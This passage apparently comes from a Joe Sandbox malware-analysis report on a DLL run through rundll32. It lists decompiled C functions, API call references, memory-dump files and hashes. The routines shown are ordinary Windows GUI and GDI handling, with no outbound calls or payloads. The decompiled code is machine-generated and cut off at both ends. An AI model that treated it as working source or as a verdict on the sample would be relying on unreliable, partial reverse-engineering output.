                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000E1D0
                                                                                                        • UpdateWindow.USER32(?), ref: 1000E1EA
                                                                                                        • SendMessageA.USER32 ref: 1000E20E
                                                                                                        • SendMessageA.USER32 ref: 1000E228
                                                                                                        • UpdateWindow.USER32(?), ref: 1000E26E
                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000E2A2
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                        • String ID:
                                                                                                        • API String ID: 2853195852-0
                                                                                                        • Opcode ID: 4739fee23b13e08182760d334db0f043c4c3d7fee15f3b90d057ef25ed01e1b6
                                                                                                        • Instruction ID: 72ff41fd9f7dd32265905932bc1d4f65a4bf79706bcd49659e4b5414e512fa02
                                                                                                        • Opcode Fuzzy Hash: 4739fee23b13e08182760d334db0f043c4c3d7fee15f3b90d057ef25ed01e1b6
                                                                                                        • Instruction Fuzzy Hash: B5418971208781ABE721DF258C84A1BBAF8FFC5BD4F00092CF995A11A5D772DE45CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000E713(intOrPtr* __ecx) {
                                                                                                        				struct HWND__* _v40;
                                                                                                        				struct HWND__* _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				void* _v52;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t43;
                                                                                                        				struct HWND__* _t48;
                                                                                                        				long _t61;
                                                                                                        				intOrPtr* _t63;
                                                                                                        				signed int _t64;
                                                                                                        				void* _t69;
                                                                                                        				intOrPtr _t71;
                                                                                                        				intOrPtr* _t72;
                                                                                                        
                                                                                                        				_t72 = __ecx;
                                                                                                        				_t69 = E10028B71();
                                                                                                        				if(_t69 != 0) {
                                                                                                        					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                                                                        						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                        					}
                                                                                                        					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                                                                        						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                                                                        				if(_t63 != 0) {
                                                                                                        					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                        					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                                        				}
                                                                                                        				_t64 =  *(_t72 + 0x4c);
                                                                                                        				if(_t64 != 0) {
                                                                                                        					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                        				}
                                                                                                        				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                                                                        				_t83 =  *(_t72 + 0x3c) & 1;
                                                                                                        				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                                                                        					_t71 =  *((intOrPtr*)(E1000AB4C(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                                                                        					if(_t71 != 0) {
                                                                                                        						_t85 =  *(_t71 + 0x20);
                                                                                                        						if( *(_t71 + 0x20) != 0) {
                                                                                                        							E1003E9B0(_t71,  &_v52, 0, 0x30);
                                                                                                        							_t48 =  *(_t72 + 0x20);
                                                                                                        							_v44 = _t48;
                                                                                                        							_v40 = _t48;
                                                                                                        							_v52 = 0x28;
                                                                                                        							_v48 = 1;
                                                                                                        							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                                                                        				E1000E541(_t61, _t72, GetWindowLongA, _t85);
                                                                                                        				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                                                                        					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                        					if(_t43 != 0) {
                                                                                                        						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E1000E65F(_t61, _t72);
                                                                                                        				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                        			}


                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LongWindow$MessageSend_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 2997958587-3887548279
                                                                                                        • Opcode ID: 9475107f4bcd42cfaf51e476ad957aef4f6cb65e63fd460d1fbacd75bfc4b36d
                                                                                                        • Instruction ID: a13358df60b230541d080f4df6e16caa9ee5b30fd314e6c263d4c0936c92a8c1
                                                                                                        • Opcode Fuzzy Hash: 9475107f4bcd42cfaf51e476ad957aef4f6cb65e63fd460d1fbacd75bfc4b36d
                                                                                                        • Instruction Fuzzy Hash: 3231E235600B919FEB10EF74C884A5AB7F9FF48390F11062CE589A7696DB70EC00CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100341AE(void* __ebx, int __ecx, void* __edi, void* __ebp, intOrPtr _a4) {
                                                                                                        				struct HDC__* _t26;
                                                                                                        				struct tagSIZE* _t39;
                                                                                                        				int _t43;
                                                                                                        				int _t44;
                                                                                                        				long _t45;
                                                                                                        				long _t46;
                                                                                                        				struct tagSIZE* _t48;
                                                                                                        				int _t51;
                                                                                                        
                                                                                                        				_t41 = __ecx;
                                                                                                        				_t51 = __ecx;
                                                                                                        				if(_a4 != 0) {
                                                                                                        					_t39 = __ecx + 0x38;
                                                                                                        					GetViewportExtEx( *(__ecx + 8), _t39);
                                                                                                        					_t48 = __ecx + 0x30;
                                                                                                        					GetWindowExtEx( *(__ecx + 8), _t48);
                                                                                                        					if(_t48->cx > 0xffffc000) {
                                                                                                        						while(1) {
                                                                                                        							_t45 = _t48->cx;
                                                                                                        							if(_t45 >= 0x4000) {
                                                                                                        								goto L6;
                                                                                                        							}
                                                                                                        							_t41 = _t39->cx;
                                                                                                        							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
                                                                                                        								_t46 = _t45 + _t45;
                                                                                                        								_t41 = _t41 + _t41;
                                                                                                        								_t48->cx = _t46;
                                                                                                        								_t39->cx = _t41;
                                                                                                        								if(_t46 > 0xffffc000) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					L6:
                                                                                                        					if( *(_t51 + 0x34) > 0xffffc000) {
                                                                                                        						while(1) {
                                                                                                        							_t43 =  *(_t51 + 0x34);
                                                                                                        							if(_t43 >= 0x4000) {
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							_t41 =  *(_t51 + 0x3c);
                                                                                                        							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
                                                                                                        								_t44 = _t43 + _t43;
                                                                                                        								_t41 = _t41 + _t41;
                                                                                                        								 *(_t51 + 0x34) = _t44;
                                                                                                        								 *(_t51 + 0x3c) = _t41;
                                                                                                        								if(_t44 > 0xffffc000) {
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L11;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					L11:
                                                                                                        					_t39->cx = E1003347E(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x10099128,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
                                                                                                        					 *(_t51 + 0x3c) = E1003347E(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x1009912c,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
                                                                                                        				}
                                                                                                        				_t26 =  *(_t51 + 4);
                                                                                                        				if(_t26 != 0) {
                                                                                                        					SetMapMode(_t26, 8);
                                                                                                        					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
                                                                                                        					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
                                                                                                        					return E100340E0(_t51);
                                                                                                        				}
                                                                                                        				return _t26;
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • GetViewportExtEx.GDI32(?,?,00000000,?,00000000,?,10034327,00000000), ref: 100341C6
                                                                                                        • GetWindowExtEx.GDI32(?,?,?,00000000,?,10034327,00000000), ref: 100341D3
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10034233
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10034250
                                                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 10034277
                                                                                                        • SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 10034288
                                                                                                        • SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 10034299
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceViewportWindow$Mode
                                                                                                        • String ID:
                                                                                                        • API String ID: 396987064-0
                                                                                                        • Opcode ID: 162b858425d00a8f4635e68dbe39dea5e427105f8c8a27507398efcdd0ffd8c4
                                                                                                        • Instruction ID: 5a9716ab1a8b05541cf5ae5f55e2f2a19fc8ee1d72fd22d957fcaa0c432ef5a2
                                                                                                        • Opcode Fuzzy Hash: 162b858425d00a8f4635e68dbe39dea5e427105f8c8a27507398efcdd0ffd8c4
                                                                                                        • Instruction Fuzzy Hash: 4E319275600A019FDB629F50DE80A1B7BF6FF44702B92892DF582A9920CB71F8518F00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E1001CC22(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v28;
                                                                                                        				char _v544;
                                                                                                        				int _v548;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t20;
                                                                                                        				intOrPtr* _t22;
                                                                                                        				intOrPtr _t27;
                                                                                                        				int _t37;
                                                                                                        				void* _t42;
                                                                                                        				intOrPtr* _t53;
                                                                                                        				void* _t54;
                                                                                                        				signed int _t56;
                                                                                                        
                                                                                                        				_t42 = __ebx;
                                                                                                        				_t20 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t20 ^ _t56;
                                                                                                        				_t53 = __ecx;
                                                                                                        				_t22 = E1001C31C(__ecx);
                                                                                                        				_t52 =  *_t22;
                                                                                                        				 *((intOrPtr*)( *_t22 + 0x160))(_a4);
                                                                                                        				if(E10011632(__ecx) < 0) {
                                                                                                        					_t49 = __ecx;
                                                                                                        					_t24 =  *((intOrPtr*)( *__ecx + 0x13c))();
                                                                                                        					if(_a4 != 0) {
                                                                                                        						_push(_t54);
                                                                                                        						_push(0xffffffff);
                                                                                                        						if(_t24 != 0) {
                                                                                                        							_t27 =  *((intOrPtr*)(_t24 + 0x20));
                                                                                                        						} else {
                                                                                                        							_t27 =  *((intOrPtr*)(__ecx + 0xc4));
                                                                                                        						}
                                                                                                        						_push(_t27);
                                                                                                        						_push(0x204);
                                                                                                        						_push( &_v544);
                                                                                                        						E10001000(_t42, _t53, 0x204, E1003EF8E());
                                                                                                        						_t31 =  *((intOrPtr*)(_t53 + 0x58));
                                                                                                        						if( *((intOrPtr*)(_t53 + 0x58)) > 0) {
                                                                                                        							E1003F3D3( &_v28, 0x11, ":%d", _t31);
                                                                                                        							_v548 = lstrlenA( &_v28);
                                                                                                        							_t37 = lstrlenA( &_v544);
                                                                                                        							_t49 = _v548 + _t37;
                                                                                                        							_t42 = _t42;
                                                                                                        							if(_v548 + _t37 < 0x204) {
                                                                                                        								E10001000(_t42, _t53, 0x204, E1003F48B(_t52,  &_v544, 0x204,  &_v28));
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t24 = E100296F9(_t49, _t52,  *((intOrPtr*)(_t53 + 0x20)),  &_v544);
                                                                                                        						_pop(_t54);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E10039F21(_t24, _t42, _v8 ^ _t56, _t52, _t53, _t54);
                                                                                                        			}



















                                                                                                        APIs
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(?), ref: 1001C326
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(00000000), ref: 1001C329
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • _wctomb_s.LIBCMT ref: 1001CC8E
                                                                                                        • _swprintf.LIBCMT ref: 1001CCB0
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1001CCC2
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1001CCD1
                                                                                                        • _strcat_s.LIBCMT ref: 1001CCEC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Parentlstrlen$LongWindow_strcat_s_swprintf_wctomb_s
                                                                                                        • String ID: :%d
                                                                                                        • API String ID: 4077431619-1955712242
                                                                                                        • Opcode ID: bfed95da87a5c65492c26d815201b42fd6dd4c6c238b9ffd280c5e0f6853dc27
                                                                                                        • Instruction ID: 6bb0e2fa273b13609a4f76e1e176c9fae11efa7639f5b51c290d710055c75903
                                                                                                        • Opcode Fuzzy Hash: bfed95da87a5c65492c26d815201b42fd6dd4c6c238b9ffd280c5e0f6853dc27
                                                                                                        • Instruction Fuzzy Hash: 03214475A002186FDB05DBA4DC99EEFB7ADEF08344F100565F50A9B142DB74EE918B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1001519D(intOrPtr* __ecx, long _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t26;
                                                                                                        				signed int _t27;
                                                                                                        				long _t40;
                                                                                                        				signed int _t43;
                                                                                                        				intOrPtr* _t54;
                                                                                                        				void* _t55;
                                                                                                        
                                                                                                        				_t47 = __ecx;
                                                                                                        				_t43 = _a4;
                                                                                                        				_t54 = __ecx;
                                                                                                        				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
                                                                                                        					E10011775(__ecx, 0);
                                                                                                        					return SetFocus(0);
                                                                                                        				}
                                                                                                        				_t26 = E1000E5E5(_t43, _t47, _t55, GetParent( *(_t54 + 0x20)));
                                                                                                        				if(_t26 == 0) {
                                                                                                        					L5:
                                                                                                        					if(_t43 != 0) {
                                                                                                        						_t27 =  *(_t54 + 0x3c);
                                                                                                        						if(_t27 < 0) {
                                                                                                        							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
                                                                                                        							 *((intOrPtr*)( *_t54 + 0xfc))();
                                                                                                        							_a4 =  *(_t54 + 0x20);
                                                                                                        							if(GetActiveWindow() == _a4) {
                                                                                                        								SendMessageA(_a4, 6, 1, 0);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
                                                                                                        							SendMessageA( *(_t54 + 0x20), 0x86, 1, 0);
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
                                                                                                        							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
                                                                                                        							 *((intOrPtr*)( *_t54 + 0xf8))();
                                                                                                        						}
                                                                                                        					}
                                                                                                        					asm("sbb ebx, ebx");
                                                                                                        					return E100138E7(_t54, _t55, ( ~_t43 & 0xfffffff0) + 0x20);
                                                                                                        				} else {
                                                                                                        					_a4 = 0;
                                                                                                        					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
                                                                                                        					_t40 = GetCurrentProcessId();
                                                                                                        					if(_t40 == _a4) {
                                                                                                        						return _t40;
                                                                                                        					}
                                                                                                        					goto L5;
                                                                                                        				}
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • SetFocus.USER32(00000000,00000000), ref: 100151BB
                                                                                                        • GetParent.USER32(?), ref: 100151C9
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 100151E4
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 100151EA
                                                                                                        • GetActiveWindow.USER32 ref: 1001523D
                                                                                                        • SendMessageA.USER32 ref: 10015251
                                                                                                        • SendMessageA.USER32 ref: 10015265
                                                                                                          • Part of subcall function 10011775: EnableWindow.USER32(?,?), ref: 10011782
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2169720751-0
                                                                                                        • Opcode ID: f4808f17725ff58dca5dc9f82ae09f75925c358e39b7e077e8b21e138b694c68
                                                                                                        • Instruction ID: a5ef11adb81990a86fef957e5b6122778ac3741d8be5c3d58e2427dd52398bce
                                                                                                        • Opcode Fuzzy Hash: f4808f17725ff58dca5dc9f82ae09f75925c358e39b7e077e8b21e138b694c68
                                                                                                        • Instruction Fuzzy Hash: 4021DB32600700EBDB22DF24CCC9B9A7BE5FF45781F184519F9869E5A0D772E9808B50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001CA96(void* __eflags, struct tagRECT* _a4) {
                                                                                                        				intOrPtr _v4;
                                                                                                        				void* __ecx;
                                                                                                        				intOrPtr _t28;
                                                                                                        				void* _t32;
                                                                                                        				long _t34;
                                                                                                        				void* _t36;
                                                                                                        				intOrPtr _t37;
                                                                                                        				signed int _t38;
                                                                                                        
                                                                                                        				_t37 = _t28;
                                                                                                        				_v4 = _t37;
                                                                                                        				_t36 = E1001C31C(_t28);
                                                                                                        				_t32 = E1001C1A3(_t36, 0);
                                                                                                        				if(_t32 == 0 || _t32 == _t37) {
                                                                                                        					_t38 = GetWindowLongA( *(_t36 + 0xd4), 0xffffffec);
                                                                                                        					if(_t32 == 0 || (E1001164C(_v4) & 0x00000200) != 0 || (E10011632(_v4) & 0x01000000) == 0) {
                                                                                                        						_t34 = _t38 | 0x00000200;
                                                                                                        					} else {
                                                                                                        						_t34 = _t38 & 0xfffffdff;
                                                                                                        					}
                                                                                                        					if(_t38 == _t34) {
                                                                                                        						goto L11;
                                                                                                        					} else {
                                                                                                        						RedrawWindow( *(_t36 + 0xd4), 0, 0, 0x81);
                                                                                                        						SetWindowLongA( *(_t36 + 0xd4), 0xffffffec, _t34);
                                                                                                        						SetWindowPos( *(_t36 + 0xd4), 0, 0, 0, 0, 0, 0x137);
                                                                                                        						if(_a4 != 0) {
                                                                                                        							GetClientRect( *(_t36 + 0xd4), _a4);
                                                                                                        						}
                                                                                                        						return 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L11:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}












                                                                                                        APIs
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(?), ref: 1001C326
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(00000000), ref: 1001C329
                                                                                                        • GetWindowLongA.USER32 ref: 1001CAC8
                                                                                                        • RedrawWindow.USER32(?,00000000,00000000,00000081,?,?,?,?,?,1001CB82,?), ref: 1001CB16
                                                                                                        • SetWindowLongA.USER32 ref: 1001CB25
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137,?,?,?,?,?,1001CB82,?), ref: 1001CB3B
                                                                                                        • GetClientRect.USER32 ref: 1001CB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$LongParent$ClientRectRedraw
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 556606033-440804003
                                                                                                        • Opcode ID: a1e961ae3e619d6220d38881e3573a291ef958478b30ab9cc7b27e67c7c3e49f
                                                                                                        • Instruction ID: 9a90b59bb855af4e0f99b740ed672d0e13458d5cacb073f3e751edc265b8d43f
                                                                                                        • Opcode Fuzzy Hash: a1e961ae3e619d6220d38881e3573a291ef958478b30ab9cc7b27e67c7c3e49f
                                                                                                        • Instruction Fuzzy Hash: 4811C47210834C6FE711EF64CCC5E6F7ADAEF80294F11052DF662AA0A1CB71DD8087A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E100381E5(void* __ecx) {
                                                                                                        				struct tagMSG _v28;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				int _t21;
                                                                                                        				intOrPtr _t24;
                                                                                                        				int _t31;
                                                                                                        				intOrPtr _t33;
                                                                                                        				void* _t38;
                                                                                                        				void* _t39;
                                                                                                        				int _t40;
                                                                                                        
                                                                                                        				_push(0);
                                                                                                        				_t39 = __ecx;
                                                                                                        				_t40 = 0xf;
                                                                                                        				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
                                                                                                        					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
                                                                                                        					__eflags = _t21;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						DispatchMessageA( &_v28);
                                                                                                        						_push(0);
                                                                                                        						continue;
                                                                                                        					}
                                                                                                        					return _t21;
                                                                                                        				}
                                                                                                        				_t24 =  *((intOrPtr*)(_t39 + 0x68));
                                                                                                        				_t36 =  *((intOrPtr*)(_t24 + 0x84));
                                                                                                        				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x84));
                                                                                                        				 *(_t39 + 0x78) =  *(_t24 + 0x80) & 0x0000f000;
                                                                                                        				SetRectEmpty(_t39 + 0xc);
                                                                                                        				 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                                                        				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t39 + 0x24)) = 0;
                                                                                                        				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t39 + 0x80)) = 0;
                                                                                                        				_t38 = E1000E5E5(0,  *((intOrPtr*)(_t24 + 0x84)), _t40, GetDesktopWindow());
                                                                                                        				_t31 = LockWindowUpdate( *(_t38 + 0x20));
                                                                                                        				_t43 = _t31;
                                                                                                        				if(_t31 == 0) {
                                                                                                        					_push(3);
                                                                                                        				} else {
                                                                                                        					_push(0x403);
                                                                                                        				}
                                                                                                        				_push(GetDCEx( *(_t38 + 0x20), 0, ??));
                                                                                                        				_t33 = E10008F77(0, _t36, _t38, _t39, _t43);
                                                                                                        				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
                                                                                                        				return _t33;
                                                                                                        			}
















                                                                                                        APIs
                                                                                                        • GetMessageA.USER32 ref: 10038204
                                                                                                        • DispatchMessageA.USER32 ref: 10038217
                                                                                                        • PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10038226
                                                                                                        • SetRectEmpty.USER32(?), ref: 1003824A
                                                                                                        • GetDesktopWindow.USER32 ref: 10038262
                                                                                                        • LockWindowUpdate.USER32(?,00000000), ref: 10038273
                                                                                                        • GetDCEx.USER32(?,00000000,00000003), ref: 1003828A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1192691108-0
                                                                                                        • Opcode ID: c7f3a9e97e145176bb155e51446f7cfd36a903232068b7cec5f48ecb4c1882fa
                                                                                                        • Instruction ID: 0518f276ba964af6d84b4b87a562fad982e1a1829898d8337b2e8ffce52ff791
                                                                                                        • Opcode Fuzzy Hash: c7f3a9e97e145176bb155e51446f7cfd36a903232068b7cec5f48ecb4c1882fa
                                                                                                        • Instruction Fuzzy Hash: 57213371500B05AFE711DF65CC88E677BECFB04285F05096EFA45D6521EB35EA048B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001BCC2(intOrPtr __ecx) {
